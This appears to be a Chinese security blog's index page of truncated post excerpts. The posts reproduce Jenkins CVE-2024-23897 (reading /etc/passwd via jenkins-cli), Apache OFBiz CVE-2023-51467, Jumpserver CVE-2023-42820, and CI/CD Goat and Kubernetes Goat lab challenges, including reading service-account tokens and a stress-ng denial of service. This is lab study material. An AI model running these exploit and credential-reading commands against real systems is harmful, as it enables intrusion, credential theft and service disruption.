Putdownd’s Blog

Jenkins 任意文件读取漏洞-CVE-2024-23897工具获取 官方描述 在jenkins的链接后面加上 /jnlpJars/jenkins-cli.jar 即可获取 1http://192.168.72.129:8080//jnlpJars/jenkins-cli.jar POC1java -jar jenkins-cli.jar -s http://192.168.72.129:8080 connect-node "@/etc/passwd" 如何RCE 需要使用 jenkins解密工具 1https://github.com/hoto/jenkins-credentials-decryptor 找到 jenkins安装路径找到这三个文件解密会得到账号密码进入后台，即可执行命令 执行命令可以参考 : https://blog.putdown.top/archives/3580484b-3ef1-4194-9d48-bcd4fdf01f92

docker-compose搭建NPS 新建文件夹 /opt/nps 在 /opt/nps文件夹下新建 docker-compose.yml 文件 文件内容： 12345678910version: "3"services: minio: privileged: true image: ffdfgdfg/nps:latest container_name: nps restart: always network_mode: "host" volumes: - /opt/nps/conf:/conf 下载配置文件 去 github下载配置文件， 1https://github.com/ehang-io/nps 整个 conf 文件夹 下载完这个文件夹包含这些文件 修改配置文件 修改 nps.conf 修改账号密码或者端口 nps 未授权和默认key修复方法 还是 nps.conf配置文件 取消掉 auth_key的注释，把后面的值改一下 启动1dock...

Apache OFBiz - CVE-2023-51467 复现环境 vulhub 注意 服务500报错 根据配置文件 security.properties headers 需要包含 Host: localhost，否则报错 修改一下请求，正常访问 利用poc： 123456789101112131415161718192021POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1Host: localhostCookie: OFBiz.Visitor=10001Pragma: no-cacheCache-Control: no-cacheSec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"Sec-Ch...

旧博客地址 https://futalk.github.io/ 迁移原因 老版为hexo搭建的静态博客，写文章和整理比较麻烦，过去的就过去吧。 文章的分类也比较杂乱 由 **github page **搭建一些加载也有问题 文章的话就慢慢搬运整理吧 一些问题 本站是把旧版的文章直接导入，阅读顺序被打乱

Jumpserver随机数种子泄露导致账户劫持漏洞（CVE-2023-42820） 靶场环境： vulhub 在其3.6.4及以下版本中，存在一处账户接管漏洞。攻击者通过第三方库django-simple-captcha泄露的随机数种子推算出找回密码时的用户Token，最终修改用户密码。 复现 点击忘记密码 点击验证码，右键新窗口打开 得到伪随机数种子seed 1http://192.168.72.129:8080/core/auth/captcha/image/2aafd36176af0093fdb48a54bfae6657648db09a/ 回到忘记密码位置 填写用户名验证码，本次用户名为admin 得到随机的token值 利用过程 根据vulhub靶场内攻击 1https://github.com/vulhub/vulhub/blob/master/jumpserver/CVE-2023-42820/poc.py 开始利用 -t 指定目标Jumpserver服务器地址 --email 指定待劫持用户的邮箱地址 --seed 前面记...

CiCd-Goat前提1234567891011121314151617- Jenkins：http://localhost:8080- Username: alice- Password: alice- Gitea：http://localhost:3000- Username: thealice- Password: thealice如果你想仔细查看管理员是如何配置的环境，可以使用如下凭据登录后台：- CTFd- Username: admin- Password: ciderland5#- Jenkins- Username: admin- Password: ciderland5#- Gitea- Username: red_queen- Password: ciderland5# EasyWhite Rabbit 我来晚了，我来晚了！没时间说你好，再见！在您被抓之前，请使用您对Wonderland/white-rabbit存储库的访问权限来窃取存储在 Jenkins 凭证存储中的flag1机密。还有两个提示： 尝试通过存储库触发管道。 如何使用 Jenki...

KubeAudit - Audit Kubernetes clustersKubeAudit - 审核Kubernetes集群 kubeaudit 是一个命令行工具和一个 Go 包，用于审计 Kubernetes 集群的各种安全问题。 1kubectl run -n kube-system --rm --restart=Never -it --image=madhuakula/hacker-container -- bash 下载kubeaudit 1wget https://github.com/Shopify/kubeaudit/releases/download/v0.21.0/kubeaudit_0.21.0_linux_amd64.tar.gz 执行 1kubeaudit all Falco - Runtime security monitoring & detectionFalco - 运行时安全监测和检测 部署 Falco 123helm repo add falcosecurity https://falcosecurity.gith...

RBAC least privileges misconfigurationRBAC 最低特权配置错误 由于Kubernetes默认情况下将所有secrets、tokens和service accounts信息都存储在一个固定的目录。直接访问这个目录，查找敏感的信息： 1cd /var/run/secrets/kubernetes.io/serviceaccount/ 要指向内部 API 服务器主机名，我们可以从环境变量中导出它 1export APISERVER=https://${KUBERNETES_SERVICE_HOST} 设置 ServiceAccount 令牌的路径 1export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount 设置命名空间值 1export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace) 读取 ServiceAccount token 1export TOKEN=$...

Hidden in layers隐藏在层中1kubectl get jobs 1kubectl describe job 找到hidden-in-layers-czrlb 1kubectl get pod hidden-in-layers-czrlb -o yaml 找到完整的镜像名字，拉取镜像 1docker pull madhuakula/k8s-goat-hidden-in-layers:latest 通过利用 docker 内置命令将 docker 镜像导出为 tar 文件 1docker save madhuakula/k8s-goat-hidden-in-layers -o hidden-in-layers.tar 使用dive分析镜像 https://github.com/wagoodman/dive/releases 1./dive madhuakula/k8s-goat-hidden-in-layers 得知敏感文件和路径 解压上面的的hidden-in-layers.tar文件 根据上面的路径找到文件 结束

12: Gaining environment information获取环境信息 访问连接 Kubernetes中的每个环境都会有很多信息要共享。包括Secrets、API Keys、配置、服务等等关键内容。 使用一些命令在服务器内信息收集 1234567891011idcat /proc/self/cgroupcat /etc/hostsmountls -la /home/printenv 13: DoS the Memory/CPU resources拒绝服务（DoS）内存/CPU资源 pod未在 Kubernetes清单中设置任何资源限制。所以我们可以轻松执行一些列消耗资源的操作。 在这个 pod中，安装了一个名为 stress-ng的程序 执行 stress-ng的程序 1stress-ng --vm 2 --vm-bytes 2G --timeout 30s 14: Hacker container preview黑客容器预览1kubectl run -it hacker-container --image=madhuakula/h...